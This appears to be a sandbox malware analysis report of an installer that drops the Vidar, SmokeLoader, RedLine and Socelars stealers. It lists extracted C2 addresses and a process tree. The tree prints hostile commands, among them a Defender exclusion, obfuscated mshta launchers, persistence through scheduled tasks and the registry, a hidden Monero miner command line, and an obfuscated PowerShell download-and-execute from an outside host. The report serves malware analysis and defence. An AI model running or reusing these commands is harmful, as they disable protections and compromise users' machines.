Resubmissions

02-12-2021 07:35

211202-je6zgsfge4 10

10-09-2021 20:31

210910-za2rzaaeh3 10

10-09-2021 19:40

210910-ydvmdsdffp 10

10-09-2021 12:06

210910-n9s4bsdbep 10

10-09-2021 05:37

210910-gbjcxahdh2 10

09-09-2021 22:16

210909-17av7aghb7 10

09-09-2021 22:12

210909-14mqksgha9 10

09-09-2021 22:12

210909-14l42sgha8 10

09-09-2021 22:11

210909-14e1qsgha7 10

09-09-2021 22:11

210909-138lnacacn 10

Analysis

  • max time kernel
    55s
  • max time network
    622s
  • platform
    windows10_x64
  • resource
    win10-fr
  • submitted
    09-09-2021 22:11

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.3MB

  • MD5

    6d18c8e8ab9051f7a70b89ff7bb0ec35

  • SHA1

    265311e2afd9f59e824f4b77162cf3dfa278eb7e

  • SHA256

    8fe6c86b038ce91a991fe6eb8a9b323bb37b554ff6b4e5c18de3fe52d4aedf6d

  • SHA512

    249bf79dc90d4662b942c7eed2a7b7816b749f6d5f7bc190bba05f826fa143d0b44f58054d8649b8626884c5fcbd1cea8abd625dc701d44b7aaac84fc74e47ff

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://shellloader.com/welcome

Extracted

Family

vidar

Version

40.5

Botnet

706

C2

https://gheorghip.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

pab123

C2

45.14.49.169:22411

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 5 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 12 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 16 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of AdjustPrivilegeToken 36 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3908
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:400
      • C:\Users\Admin\AppData\Local\Temp\7zS0910A4A4\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS0910A4A4\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1140
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2152
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
              PID:4144
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Thu219d5fe8cf316.exe
            4⤵
              PID:2004
              • C:\Users\Admin\AppData\Local\Temp\7zS0910A4A4\Thu219d5fe8cf316.exe
                Thu219d5fe8cf316.exe
                5⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:4112
                • C:\ProgramData\1642816.exe
                  "C:\ProgramData\1642816.exe"
                  6⤵
                    PID:4976
                    • C:\Windows\system32\WerFault.exe
                      C:\Windows\system32\WerFault.exe -u -p 4976 -s 1928
                      7⤵
                      • Program crash
                      PID:6588
                  • C:\ProgramData\3690968.exe
                    "C:\ProgramData\3690968.exe"
                    6⤵
                      PID:5060
                      • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                        7⤵
                          PID:516
                      • C:\ProgramData\5777771.exe
                        "C:\ProgramData\5777771.exe"
                        6⤵
                          PID:4676
                        • C:\ProgramData\1625970.exe
                          "C:\ProgramData\1625970.exe"
                          6⤵
                            PID:5380
                            • C:\Windows\SysWOW64\mshta.exe
                              "C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE ( creatEoBjECT ( "wScRiPt.shELl" ). RuN ("CMD /c TypE ""C:\ProgramData\1625970.exe"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if """" =="""" for %B iN ( ""C:\ProgramData\1625970.exe"" ) do taskkill /Im ""%~NxB"" /F " , 0 , tRUe ) )
                              7⤵
                                PID:860
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c TypE "C:\ProgramData\1625970.exe"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "" =="" for %B iN ( "C:\ProgramData\1625970.exe" ) do taskkill /Im "%~NxB" /F
                                  8⤵
                                    PID:1368
                                    • C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE
                                      GZ9~4QZ~O.EXe -P6_oIH__Ioj5q
                                      9⤵
                                        PID:5948
                                        • C:\Windows\SysWOW64\mshta.exe
                                          "C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE ( creatEoBjECT ( "wScRiPt.shELl" ). RuN ("CMD /c TypE ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if ""-P6_oIH__Ioj5q "" =="""" for %B iN ( ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" ) do taskkill /Im ""%~NxB"" /F " , 0 , tRUe ) )
                                          10⤵
                                            PID:4960
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c TypE "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "-P6_oIH__Ioj5q " =="" for %B iN ( "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE" ) do taskkill /Im "%~NxB" /F
                                              11⤵
                                                PID:1716
                                            • C:\Windows\SysWOW64\regsvr32.exe
                                              "C:\Windows\System32\regsvr32.exe" T~DJNB.F -u /S
                                              10⤵
                                                PID:7144
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /Im "1625970.exe" /F
                                              9⤵
                                              • Kills process with taskkill
                                              PID:5404
                                      • C:\ProgramData\947269.exe
                                        "C:\ProgramData\947269.exe"
                                        6⤵
                                          PID:5504
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c Thu21a1ef054cac78a.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:2484
                                      • C:\Users\Admin\AppData\Local\Temp\7zS0910A4A4\Thu21a1ef054cac78a.exe
                                        Thu21a1ef054cac78a.exe
                                        5⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1056
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c taskkill /f /im chrome.exe
                                          6⤵
                                            PID:7004
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im chrome.exe
                                              7⤵
                                              • Kills process with taskkill
                                              PID:5112
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Thu2164f292a11ce.exe
                                        4⤵
                                          PID:652
                                          • C:\Users\Admin\AppData\Local\Temp\7zS0910A4A4\Thu2164f292a11ce.exe
                                            Thu2164f292a11ce.exe
                                            5⤵
                                            • Executes dropped EXE
                                            PID:4364
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Thu21624565bb917a.exe
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:1104
                                          • C:\Users\Admin\AppData\Local\Temp\7zS0910A4A4\Thu21624565bb917a.exe
                                            Thu21624565bb917a.exe
                                            5⤵
                                            • Executes dropped EXE
                                            PID:4120
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Thu21b9847cb6727.exe
                                          4⤵
                                            PID:2204
                                            • C:\Users\Admin\AppData\Local\Temp\7zS0910A4A4\Thu21b9847cb6727.exe
                                              Thu21b9847cb6727.exe
                                              5⤵
                                              • Executes dropped EXE
                                              PID:4412
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Thu214ce31cede21.exe
                                            4⤵
                                              PID:2404
                                              • C:\Users\Admin\AppData\Local\Temp\7zS0910A4A4\Thu214ce31cede21.exe
                                                Thu214ce31cede21.exe
                                                5⤵
                                                • Executes dropped EXE
                                                PID:4300
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c Thu2156de5489c19.exe
                                              4⤵
                                                PID:3712
                                                • C:\Users\Admin\AppData\Local\Temp\7zS0910A4A4\Thu2156de5489c19.exe
                                                  Thu2156de5489c19.exe
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:4404
                                                  • C:\Users\Admin\AppData\Local\Temp\tmpEE7C_tmp.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\tmpEE7C_tmp.exe"
                                                    6⤵
                                                      PID:736
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c Thu21568b0ab8.exe
                                                  4⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2728
                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0910A4A4\Thu21568b0ab8.exe
                                                    Thu21568b0ab8.exe
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4176
                                                    • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                      6⤵
                                                        PID:4808
                                                        • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                          7⤵
                                                            PID:4464
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                              8⤵
                                                                PID:1724
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                  9⤵
                                                                  • Creates scheduled task(s)
                                                                  PID:3128
                                                              • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                8⤵
                                                                  PID:5484
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                    9⤵
                                                                      PID:6680
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                        10⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:4792
                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                      9⤵
                                                                        PID:6996
                                                                      • C:\Windows\explorer.exe
                                                                        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                        9⤵
                                                                          PID:7708
                                                                    • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                                                                      7⤵
                                                                        PID:4664
                                                                        • C:\ProgramData\6469709.exe
                                                                          "C:\ProgramData\6469709.exe"
                                                                          8⤵
                                                                            PID:5592
                                                                          • C:\ProgramData\2655722.exe
                                                                            "C:\ProgramData\2655722.exe"
                                                                            8⤵
                                                                              PID:5632
                                                                            • C:\ProgramData\7887771.exe
                                                                              "C:\ProgramData\7887771.exe"
                                                                              8⤵
                                                                                PID:6060
                                                                              • C:\ProgramData\4015705.exe
                                                                                "C:\ProgramData\4015705.exe"
                                                                                8⤵
                                                                                  PID:5100
                                                                                • C:\ProgramData\3628584.exe
                                                                                  "C:\ProgramData\3628584.exe"
                                                                                  8⤵
                                                                                    PID:5096
                                                                                  • C:\ProgramData\4502136.exe
                                                                                    "C:\ProgramData\4502136.exe"
                                                                                    8⤵
                                                                                      PID:3168
                                                                                  • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                                                    7⤵
                                                                                      PID:4240
                                                                                      • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                        8⤵
                                                                                          PID:744
                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                        7⤵
                                                                                          PID:5036
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 808
                                                                                            8⤵
                                                                                            • Program crash
                                                                                            PID:2292
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 844
                                                                                            8⤵
                                                                                            • Program crash
                                                                                            PID:2760
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 908
                                                                                            8⤵
                                                                                            • Program crash
                                                                                            PID:5456
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 960
                                                                                            8⤵
                                                                                            • Program crash
                                                                                            PID:4500
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 948
                                                                                            8⤵
                                                                                            • Program crash
                                                                                            PID:372
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 940
                                                                                            8⤵
                                                                                            • Program crash
                                                                                            PID:6212
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 1012
                                                                                            8⤵
                                                                                            • Program crash
                                                                                            PID:6836
                                                                                        • C:\Users\Admin\AppData\Local\Temp\udptest.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
                                                                                          7⤵
                                                                                            PID:3388
                                                                                          • C:\Users\Admin\AppData\Local\Temp\DVORAK.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"
                                                                                            7⤵
                                                                                              PID:2364
                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                C:\Windows\system32\WerFault.exe -u -p 2364 -s 1560
                                                                                                8⤵
                                                                                                • Program crash
                                                                                                PID:5212
                                                                                            • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                              7⤵
                                                                                                PID:1376
                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-2AM36.tmp\setup_2.tmp
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-2AM36.tmp\setup_2.tmp" /SL5="$D0052,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                  8⤵
                                                                                                    PID:5200
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                      9⤵
                                                                                                        PID:5432
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-EE0VM.tmp\setup_2.tmp
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-EE0VM.tmp\setup_2.tmp" /SL5="$102FA,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                          10⤵
                                                                                                            PID:5668
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-99OV6.tmp\postback.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-99OV6.tmp\postback.exe" ss1
                                                                                                              11⤵
                                                                                                                PID:5660
                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                  explorer.exe ss1
                                                                                                                  12⤵
                                                                                                                    PID:4656
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                                                                      13⤵
                                                                                                                        PID:4872
                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                                                                          14⤵
                                                                                                                            PID:740
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\FYqTm8jI5.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\FYqTm8jI5.exe"
                                                                                                                          13⤵
                                                                                                                            PID:2404
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"
                                                                                                                              14⤵
                                                                                                                                PID:5552
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\
                                                                                                                                  15⤵
                                                                                                                                    PID:5236
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\
                                                                                                                                      16⤵
                                                                                                                                        PID:6688
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe" /F
                                                                                                                                      15⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:6404
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\rleBbOBhT.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\rleBbOBhT.exe"
                                                                                                                                  13⤵
                                                                                                                                    PID:4440
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                                                                                        7⤵
                                                                                                                          PID:3492
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                                                                            8⤵
                                                                                                                              PID:5132
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                                            7⤵
                                                                                                                              PID:5164
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                                                                              7⤵
                                                                                                                                PID:5268
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c Thu2102ff6cfe07c.exe
                                                                                                                          4⤵
                                                                                                                            PID:372
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS0910A4A4\Thu2102ff6cfe07c.exe
                                                                                                                              Thu2102ff6cfe07c.exe
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4332
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c Thu214aaca5625.exe
                                                                                                                            4⤵
                                                                                                                              PID:2352
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0910A4A4\Thu214aaca5625.exe
                                                                                                                                Thu214aaca5625.exe
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:4324
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-H41PP.tmp\Thu214aaca5625.tmp
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-H41PP.tmp\Thu214aaca5625.tmp" /SL5="$301E4,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS0910A4A4\Thu214aaca5625.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:4564
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-7FC0B.tmp\46807GHF____.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-7FC0B.tmp\46807GHF____.exe" /S /UID=burnerch2
                                                                                                                                    7⤵
                                                                                                                                      PID:4964
                                                                                                                                      • C:\Program Files\Windows Sidebar\TGIAABNXMJ\ultramediaburner.exe
                                                                                                                                        "C:\Program Files\Windows Sidebar\TGIAABNXMJ\ultramediaburner.exe" /VERYSILENT
                                                                                                                                        8⤵
                                                                                                                                          PID:1308
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-4TSO0.tmp\ultramediaburner.tmp
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-4TSO0.tmp\ultramediaburner.tmp" /SL5="$20406,281924,62464,C:\Program Files\Windows Sidebar\TGIAABNXMJ\ultramediaburner.exe" /VERYSILENT
                                                                                                                                            9⤵
                                                                                                                                              PID:2680
                                                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                10⤵
                                                                                                                                                  PID:5724
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\36-56940-05a-115ae-a2a7dccfe159f\Kylahaxaevae.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\36-56940-05a-115ae-a2a7dccfe159f\Kylahaxaevae.exe"
                                                                                                                                              8⤵
                                                                                                                                                PID:6240
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\91-b00e6-6d3-626ae-958089ae8cfd5\Joligewaely.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\91-b00e6-6d3-626ae-958089ae8cfd5\Joligewaely.exe"
                                                                                                                                                8⤵
                                                                                                                                                  PID:6316
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sixyceru.pl1\GcleanerEU.exe /eufive & exit
                                                                                                                                                    9⤵
                                                                                                                                                      PID:1368
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\sixyceru.pl1\GcleanerEU.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\sixyceru.pl1\GcleanerEU.exe /eufive
                                                                                                                                                        10⤵
                                                                                                                                                          PID:6828
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w4nf3gal.moh\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                        9⤵
                                                                                                                                                          PID:7136
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\w4nf3gal.moh\installer.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\w4nf3gal.moh\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                            10⤵
                                                                                                                                                              PID:7260
                                                                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\w4nf3gal.moh\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\w4nf3gal.moh\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630966064 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                11⤵
                                                                                                                                                                  PID:7228
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\scmghbgn.5hz\anyname.exe & exit
                                                                                                                                                              9⤵
                                                                                                                                                                PID:5300
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\scmghbgn.5hz\anyname.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\scmghbgn.5hz\anyname.exe
                                                                                                                                                                  10⤵
                                                                                                                                                                    PID:7416
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oitnyceu.vgi\gcleaner.exe /mixfive & exit
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:5344
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\oitnyceu.vgi\gcleaner.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\oitnyceu.vgi\gcleaner.exe /mixfive
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:7480
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oqmpjosp.1qu\autosubplayer.exe /S & exit
                                                                                                                                                                      9⤵
                                                                                                                                                                        PID:6664
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c Thu21df5caa1b78de6.exe /mixone
                                                                                                                                                              4⤵
                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                              PID:196
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0910A4A4\Thu21df5caa1b78de6.exe
                                                                                                                                                                Thu21df5caa1b78de6.exe /mixone
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:4136
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 656
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:576
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 700
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:5460
